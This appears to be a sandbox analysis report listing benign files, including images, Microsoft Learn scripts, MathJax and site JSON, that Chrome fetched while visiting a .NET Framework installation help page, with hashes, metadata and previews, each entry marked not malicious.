                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1432
                                                                                                                                                                                                            Entropy (8bit):4.986131881931089
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                                                            MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                                                            SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                                                            SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                                                            SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                                                            Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):52717
                                                                                                                                                                                                            Entropy (8bit):5.462668685745912
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                                                            MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                                                            SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                                                            SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                                                            SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                                                            Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1173007
                                                                                                                                                                                                            Entropy (8bit):5.503893944397598
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                                                            MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                                                            SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                                                            SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                                                            SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                                                            Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):3.875
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:HMB:k
                                                                                                                                                                                                            MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                            SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                            SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                            SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                            Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33370
                                                                                                                                                                                                            Entropy (8bit):7.973675198531228
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                                                            MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                                                            SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                                                            SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                                                            SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):13339
                                                                                                                                                                                                            Entropy (8bit):7.683569563478597
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                                                            MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                                                            SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                                                            SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                                                            SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/favicon.ico
                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):1817143
                                                                                                                                                                                                            Entropy (8bit):5.501007973622959
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:aLX8PHFluFxBSB1DkCXWjfz8gEPPXL/tie:auHFluFxBSB1DkCXWjfz7EPPXztH
                                                                                                                                                                                                            MD5:F57E274AE8E8889C7516D3E53E3EB026
                                                                                                                                                                                                            SHA1:F8D21465C0C19051474BE6A4A681FA0B0D3FCC0C
                                                                                                                                                                                                            SHA-256:2A2198DDBDAEDD1E968C0A1A45F800765AAE703675E419E46F6E51E3E9729D01
                                                                                                                                                                                                            SHA-512:9A9B42F70E09D821B799B92CB6AC981236FCF190F0A467CA7F7D382E3BCA1BC1D71673D37CD7426499D24DFBC0B7A6D10676C0E3FB2B0292249A5ABAB78F23F4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/static/assets/0.4.028726178/scripts/en-us/index-docs.js
                                                                                                                                                                                                            Preview:"use strict";(()=>{var hve=Object.create;var _T=Object.defineProperty;var E2=Object.getOwnPropertyDescriptor;var bve=Object.getOwnPropertyNames;var _ve=Object.getPrototypeOf,vve=Object.prototype.hasOwnProperty;var yve=(e,t,o)=>t in e?_T(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var xve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of bve(t))!vve.call(e,r)&&r!==o&&_T(e,r,{get:()=>t[r],enumerable:!(n=E2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?hve(_ve(e)):{},xve(t||!e||!e.__esModule?_T(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?E2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&_T(t,o,r),r};var ji=(e,t,o)=>(yve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"brandLink":{"biName":"learn","displayName":"Learn","href":"/"},"featuredContent":[{"biName":"1-microsoft-learn-for-organizations","description":"Access curated resources to upskill your team and close skills gaps.","href":"/training/organizations/","supertitle":"Microsoft Learn for Organizations","title":"Boost your team\u0027s technical skills"}],"metadata":{"git_commit_id":"dab49ca79cb372010aeaec5e99463f6cec8df000"},"navCategories":[{"biName":"1-discover","panel":{"panelContent":[{"biName":"1-documentation","componentType":"header-panel-card","description":"In-depth articles on Microsoft developer tools and technologies","href":"/docs/","title":"Documentation"},{"biName":"2-training","componentType":"header-panel-card","description":"Personalized learning paths and courses","href":"/training/","title":"Training"},{"biName":"3-credentials","componentType":"header-panel-card","description":"Globally recognized, industry-endorsed credentials","href":"/credentials/","title":"Credential
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):17174
                                                                                                                                                                                                            Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):13842
                                                                                                                                                                                                            Entropy (8bit):7.802399161550213
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:NLNf+jBQsDHg7av3EEondO8PuRu2mIYXEIiDm42NpsHFMHfgnJ4K2DVwv:NLt+1jDmY+ndXwjLUpiDwpzfwoDVk
                                                                                                                                                                                                            MD5:F6EC97C43480D41695065AD55A97B382
                                                                                                                                                                                                            SHA1:D9C3D0895A5ED1A3951B8774B519B8217F0A54C5
                                                                                                                                                                                                            SHA-256:07A599FAB1E66BABC430E5FED3029F25FF3F4EA2DD0EC8968FFBA71EF1872F68
                                                                                                                                                                                                            SHA-512:22462763178409D60609761A2AF734F97B35B9A818EC1FD9046AFAB489AAD83CE34896EE8586EFE402EA7739ECF088BC2DB5C1C8E4FB39E6A0FC5B3ADC6B4A9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/install-3-5.png
                                                                                                                                                                                                            Preview:.PNG........IHDR................1....sRGB.........gAMA......a.....pHYs..........o.d..5.IDATx^..[.,.]...../<.!.B(/y..).F\r...!(.H..a ..B.~..A..KXA.M...6..8...!1....l./.X.1....2.`.y"l..R...V.....{...}._gWW.Z.VUw.N...U..P@..... ..@.A...".$..E.I.........$..("H..PD..... ..p....U.}.{.....l..A.....A........s.......D.0...@....E..x........L. /.".A.....$...Y."...%.I..["../.&.I..[`.0..IA.........p4.I.........$..("H..PD..... ..@.A...".$..E.I.........$..("H..PD..... ..@.A...".$..E.>H...O.................?.~.......].7.....a?....(H....m.G..G..a.P..?yo......f?...o. .B.....mo{[....:9<].....7.....a.....S..Cd.5,.R....#....>......._g.....Wo|.....z.g.........w.T...]x.>.....y(.........6....[..px...U....~.~hu...}H.......~.L... ....r...iY.$..Id..Ax"../....._..U....OTo|.Mh.km..A.k..k....n.C`|._\=...o...a.e.. ...&.A2..k.. ....X.+...C..P....y..>.{._..(H....8(.?...w.}M.........:s_!.m.........BY..T..z.5{.W.~..6.....F....bq....m.....?.......v....o..o...ki...iX.$......\]V...V...
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33148), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):33148
                                                                                                                                                                                                            Entropy (8bit):4.917595394577667
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:FnvJOb4OLIch+KCnMet7NPXlJl+HjZjBTRdE0zIwHdZ4vNNpUjV8din4E9hLUuro:5hOEO8chkMet7pCjBfcHkWOzUuro
                                                                                                                                                                                                            MD5:C4DE3932AA578FA03847604F09660315
                                                                                                                                                                                                            SHA1:5EFBA9D7F437AF4786560559FBF162C4475AAD4F
                                                                                                                                                                                                            SHA-256:7683C2566CBF3C67F1A645891CC7B4DE7D143FE40E0271E106AB55E90EF9C5A8
                                                                                                                                                                                                            SHA-512:3DCA7F8C7C2997D473B2B80916F3E976167BA06300E915CB301DB2A024A826B9E8D3A60B6111835A5FB9A3273B4080D89351F664F9CC410C18B7F76327C326AE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{"items":[{"href":"./","toc_title":".NET Framework documentation"},{"href":"get-started/overview","toc_title":"Overview of .NET Framework"},{"children":[{"href":"get-started/","toc_title":"Overview"},{"href":"get-started/out-of-band-releases","toc_title":"Out-of-band releases"},{"href":"get-started/system-requirements","toc_title":"System requirements"}],"toc_title":"Get started"},{"children":[{"href":"install/","toc_title":"Overview"},{"href":"install/guide-for-developers","toc_title":"For developers"},{"children":[{"href":"install/on-windows-11","toc_title":"Windows 11"},{"href":"install/on-windows-10","toc_title":"Windows 10 and Windows Server 2016"},{"href":"install/on-windows-8-1","toc_title":"Windows 8.1 and Windows Server 2012 R2"},{"href":"install/on-windows-8","toc_title":"Windows 8 and Windows Server 2012"},{"href":"install/on-server-2022","toc_title":"Windows Server 2022"},{"href":"install/on-server-2019","toc_title":"Windows Server 2019"}],"toc_title":"By OS version"},{"hre
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):5644
                                                                                                                                                                                                            Entropy (8bit):4.785769732002188
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ogVOjPW7cI3aDNjExAjfWQpL0dpwmWMv7AD8RevyvRJNjyZPtJ27RlhiewZjMeZf:og5cUaDNjESLWQN0dpwm9+6DlUu7lYjX
                                                                                                                                                                                                            MD5:B5885C991E30238110973653F2408300
                                                                                                                                                                                                            SHA1:39B0A79D951F8254E21821134E047C76F57AD2A8
                                                                                                                                                                                                            SHA-256:085BF5AE32E6F7F1299CA79248B0CB67EBD31566728A69F4466E1659C004732E
                                                                                                                                                                                                            SHA-512:6BEC209D933C7A1065047637F550B7A36809D835938C04851A3B09DF644BD3EC85A2CE30F73FCFB709FE7AF3453799B2EB76702D0AB2BE067CD07D2EC03537C0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            URL:https://learn.microsoft.com/en-us/content-nav/site-header/site-header.json?
